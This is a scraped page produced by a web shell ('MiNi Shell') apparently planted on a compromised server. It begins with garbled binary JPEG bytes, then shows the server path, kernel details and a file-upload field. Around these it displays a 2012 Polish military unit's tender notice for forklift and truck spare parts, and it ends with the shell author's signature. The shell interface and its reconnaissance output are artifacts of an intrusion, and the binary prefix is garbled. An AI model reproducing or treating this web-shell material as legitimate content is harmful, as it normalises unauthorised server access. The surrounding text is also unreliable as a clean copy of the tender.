JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/444434-N-2012.html

<p class="kh_header"><b>Wałcz: Dostawę części zamiennych do sprzętu przeładunkowego i transportowego</b><br>
<b>Numer ogłoszenia: 444434 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4224 , ul. Ciasna 7, 78-601 Wałcz, woj. zachodniopomorskie, tel. 67 2502184, faks 67 2502184, 2502971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1rblog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę części zamiennych do sprzętu przeładunkowego i transportowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa części zamiennych do sprzętu przeładunkowego 
i transportowego typu  WNA, WW, GPW, RAK
Zestaw części  zamiennych do wózków transportowych akumulatorowych        typu WAN
Zestaw części zamiennych do wózków widłowych spalinowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium na cały przedmiot zamówienia, w wysokości 4 471,00 zł.
2.Zamawiający żąda na poszczególne zadania, wadium w kwotach:
zadanie nr 1 -        1 731,00 zł.
zadanie nr 2 -        2 740,00 zł. 
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275, ze zm.)
4. W przypadku wniesienia wadium w formie gwarancji, z jej treści winno wynikać bezwarunkowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
5.	Wadium wnoszone w poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w pkt 3 ppkt 5 należy zdeponować przed terminem składania ofert w kasie Zamawiającego - budynek nr 1 pokój nr 3, a kopię załączyć do oferty (godziny otwarcia kasy: w dni robocze w godzinach: 8.00 -  9.00 i 12.00 - 14.00.). Zamawiający dopuszcza przesłanie oryginału dokumentu za pośrednictwem poczty, w takiej sytuacji dokument należy przesłać na adres Zamawiającego z dopiskiem KASA - numer sprawy... Dokument winien być dostarczony Zamawiającemu przed terminem składania ofert.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego:  NBP o/o Bydgoszcz nr rach. 47101010780083121391200000
 a) Potwierdzenie wniesienia wadium należy dołączyć do oferty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub inną osobę upoważnioną do reprezentowania Wykonawcy. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego.
 b) przy wnoszeniu wadium Wykonawca winien podać: nazwę przedmiotu zamówienia, numer sprawy oraz numer swojego konta, na które należy zwrócić wadium.
 7.  Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.  Zamawiający zwraca niezwłocznie wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę, na wniosek Wykonawcy który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 1-4 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 1-4 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 1-4 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza określonego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonego w art. 22 ust. 1 pkt 1-4 ustawy - wymienionego w załączniku nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, Zamawiający żąda oświadczenia Wykonawcy potwierdzającego, że oferowany przedmiot zamówienia o innych oznaczeniach katalogowych niż żądane przez Zamawiającego jest współzmienny pod względem parametrów technicznych, eksploatacyjnych i montażowych, w przypadku zaoferowania produktów współzamiennych - załącznik nr 5 do niniejszej SIWZ (Oświadczenie składają tylko wykonawcy, którzy oferują produkty współzmienne (równoważne).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli one dotyczą: 
a) zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia,
b) wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych 
od Wykonawcy i Zamawiającego,
c) zmiany danych Wykonawcy ( np. zmiana siedziby, adresu, nazwy),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1rblog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW4224 Wałcz, ul. Ciasna 7, 78-601 Wałcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 08:30, miejsce: Kancelaria Jawna JW4224 Wałcz budynek nr 1pom. nr 4 od PN-PT w godz. 7.00-15.00. Otwarcie ofert - siedziba Zamawiajacego bud. nr 1w dniu 20.11.2012 r. godz. 9:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw części  zamiennych do wózków transportowych akumulatorowych                     typu WAN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przewód hamulcowy 095-04-0006
2	Przewód hamulcowy 095-04-0005
3	Przewód hamulcowy 095-04-0004
4	Przewód hamulcowy 095-04-0016
5	Przewód hamulcowy 095-04-0086
6	Przewód hamulcowy 095-04-0087
7	Przewód hamulcowy 095-04-0007
8	Przewód elastyczny hamulca b10-3506025
9	Dwuobwodowa pompa hamulcowa 17-3505010
10	Pierścień uszcz. 30X55X10 SIMERING
11	Linka hamulca ręcznego 095-04-0008
12	Bezpiecznik samochodowy 8A MD5-02-07
13	Sworzeń 95-01-1338
14	Amperomierz tab. MER-72tm 150A
15	Woltomierz tab MER-72TM 100V
16	Sterownik MTW-12 4155249043
17	Końcówka drążka kierownic. 01-3003040.
18	Końcówka drążka kierownic. 20-3003056-2W
19	Czwórnik 95-01-1166
20	Pierścień O-ring 41,2x3 PN86961
21	Pierścień o-ring 65x3
22	Trójnik 97-01-1092
23	Szczęka hamulcowa 95-01-0147
24	Tulejka 018-01-1134                             
25	Tulejka 95-01-1113
26	Cylinder rozpierający kpl. 095-01-1462
27	Półoś 095-01-1354                            
28	Łożysko kulkowe 6212 60x110x22
29	Sprzęgło 095-01-1139                  
30	Pierścień SIMMERA A-50X72X10
31	Cylinderek 40-3502040
32	Pierścień uszczelniający 169,2x5,7 PN86961
33	Pierścień o-ring 68x3 PN73093
34	Nakrętka 095-01-1371    KM8
35	Sprężyna 095-01-1005
36	Łącznik miniaturowy KLM-1 311350950290
37	Wtyczka ZW-2-II-35-MM2
38	Gniazdo wtykowe ZG-1
39	Styk stały N-412560
40	Styk ruchomy n-412557
41	Połącznik hydrauliczny 556-12-00
42	Sygnał dźwiękowy 311580950300
43	Śruba 095-01-1358
44	Łożysko 6205 zz
45	Pierścień dociskowy 018-01-1143
46	Tarcza 18-01-0034
47	Śruba 095-01-1141
48	Przewód LGY-750V 16mm2
49	Płyta mechanizmu zwrotniczego 95-01-0092
50	Pompa hamulcowa jednostopniowa KP-200
51	Dźwignia hamulca ręcznego 18-01-0004
52	Mechanizm kierowniczy 095-01-0114
53	Zespół cięgien 95-01-0115
54	Sterownik NTW-10
55	Wyłącznik główny 95-03-0018
56	Przycisk sygnalizacji P4015-WO
57	Lampa kierunkowskazu prawa 232-07-0007
58	Przełącznik kierunków typ 062.000
59	Żarówka 12v 21W BA-15D
60	Żarówka 12v 21 5w bay-15D
61	Przerywacz kierunkowskazów me-8e
62	Ślimak 095-01-1188
63	Segment ślimacznicy 095-01-1125
64	Koło kierownicy 18-08-1176
65	Pokrywka 16-07-1008
66	Ślimacznica 95-01-0057
67	Ślimak 95-01-1137
68	Lampa tylna zesp.072 720012200 żbik
69	Wyłącznik zapłonu WZ-60 
70	Płytka mech. Zwrotniczego KPL. 095-01-0135
71	Dźwignia hamulca ręcznego 095-04-1011
72	Reflektor lewy L 095-08-0025
73	Reflektor prawy P 095-08-0026
74	Przełącznik kier. Obrotów 311150181480
75	Wyłącznik główny ED 250 B-1 113579104210
76	PIERŚCIEŃ OSADCZY SPRĘŻYSTY 25Z
77	Pierścień 16Z
78	Pierścień osadczy sprężynujący 30Z
79	Pierścień osadczy sprężysty 72W
80	Wpust pryzmowy 604-17-0610.0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestaw części zamiennych do wózków widłowych spalinowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	SWORZEŃ PŁYTY 40315200
2	KOŃCÓWKA DRĄŻKA DESTA TX
3	WAŁ STOPNIOWANY 30310502
4	PIERŚCIEŃ USZCZELNIAJĄCY O-RING 34271
5	PIERSCIEŃ MOSIĘŻNY 0091189
6	RAMIĘ ZWROTNICY 3-02586-08
7	DŹWIGNIA ZAWIESZENIA PRAWA 30258607
8	TULEJA GÓRNA WAŁU 40206003
9	TULEJA 32130 DVHM 3222TM DESTA
10	OSŁONA GUMOWA OSI SKRTNEJ TX 37243
11	KLIN WALCOWY ĆSN 30 1382.12 12X8X27
12	POKRYWA WAŁU Ć.V.5111 3615
13	POMPA X58-25-00-3
14	KOŁPAK 123-02-0026
15	STYK RUCHOMY N-49885
16	STYK STAŁY N-49886
17	POMPA WODY 46506150-CH
18	ZACZEP ŁAŃCUCHA T-6.0.3
19	CIĘGNO W6-06.00.05
20	KOŁEK WALCOWY 8H 11X50 PN85021
21	ŁAŃCUCH PŁYTKOWY FLEYERA
22	SERWOMECHANIZM HAMULCOWY SH1-0,00
23	ZĄB WIDEŁ W26-15.01.00
24	PRZEWÓD GUMOWY GÓRNY 50-01-703-2
25	PRZEWÓD GUMOWY DOLNY 50-01-706-3
26	CYLINDER ROZPIERAJĄCY 12-35-02040
27	LINKA HAMULCOWA W7-260700
28	REGULATOR NAPIĘCIA RC2 12D
29	DĘTKA 23X5 SW1-M-56X60-C
30	HAMULEC RĘCZNY 1.67.204R 4200822
31	CIĘGNO GASZENIA SILNIKA 308103060-ZAMET
32	TRAKTOMETR 675 220
33	REGULATOR PRZEPŁYWU W26-09.03.00.A
34	TARCZA KOŁA 97-01-0023
35	POMPA WTRYSKOWA 36966
36	PRZEWÓD NADMUCHU STRONY LEWEJ 641.27.024
37	ZAWÓR BEZPIECZEŃSTWA ROZDZIELACZA RBS10-18MPa
38	ZAWÓR BEZPIECZEŃSTWA ROZDZIELACZA RBS16-18MPa
39	DZIELNIK STRUMIENIA SBO6-51.70 0
40	ELEKTROZAWÓR BLOKU STERUJĄCEGO EMSGC-37 30
41	PIERŚCIEŃ USZCZELNIAJĄCY B85X120X15MM
42	KOŁPAK 123-02-0026
43	OBEJMA W7-21.04.04.A
44	TŁUMIK 1661 930 M1
45	FILTR POWIETRZA W71-15.11.00
46	ŁOŻYSKO WYCISKOWE GPZ-688911, 20-1601072
47	TULEJA WYCISKOWA 0042-21-002 0
48	TULEJA WYŁĄCZAJĄCA SPRZĘGŁAC8-24.00.50.B
49	FILTR OLEJU PP 4,9
50	FILTR OLEJU PP-8,4-0050 60-738 0
51	PAS BEZPIECZEŃSTWA 16R-04-0890
52	BIEŻNIK Z TARCZĄ 97-01-0113
53	BIEŻNIK Z TARCZĄ (KOŁO TYLNE) 16-01-0039
54	SWORZEŃ 232-04-1012
55	ŚRUBA 233-04-1003
56	ŚRUBA 232-04-1011
57	ŚRUBA 233-04-1006
58	ŚRUBA 232-04-1050
59	PIERŚCIEŃ SIMMERA B-95X125X15 PN86960
60	FILTR WPL30G-4-P-A-R
61	WSTĘPNY FILTR POWIETRZA 0042 05-302 0
62	OGNIWO ZŁĄCZNE 10B2PS
63	WSTĘPNY FILTR POWIETRZA 359.000
64	ŁAŃCUCH 10B-2-295PS
65	ŁOŻYSKO TOCZNE 30213
66	ŁOŻYSKO TOCZNE 30212
67	KONEKTOR ŻEŃSKI AWG12-14
68	PRZEWÓD YLY  1X50 MM2
69	AKUMULATOR 12V51AH 6SE 51
70	ZAWÓR PRZELEWOWY ZP1-160-10
71	ZAWÓR HAMUJĄCY W8-09-02-00
72	GRZEBIEŃ ZĘBATKI HAMULCA 123-08-1014
73	DŹWIGNIA HAMULCA RĘCZ.KPL. 20-3508015
74	AKUMULATOR ROZRUCHOWY OŁOWIOWY
75	FILTR SIATKOWO-MAGNETYCZNY 123-01-0011
76	NAKRĘTKA 2641-016-01B
77	KOŃCÓWKA 2641-016-02C
78	PASEK KLINOWY 12X10X1357
79	ŚWIATŁO OSTRZEGAWCZE K2200158.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com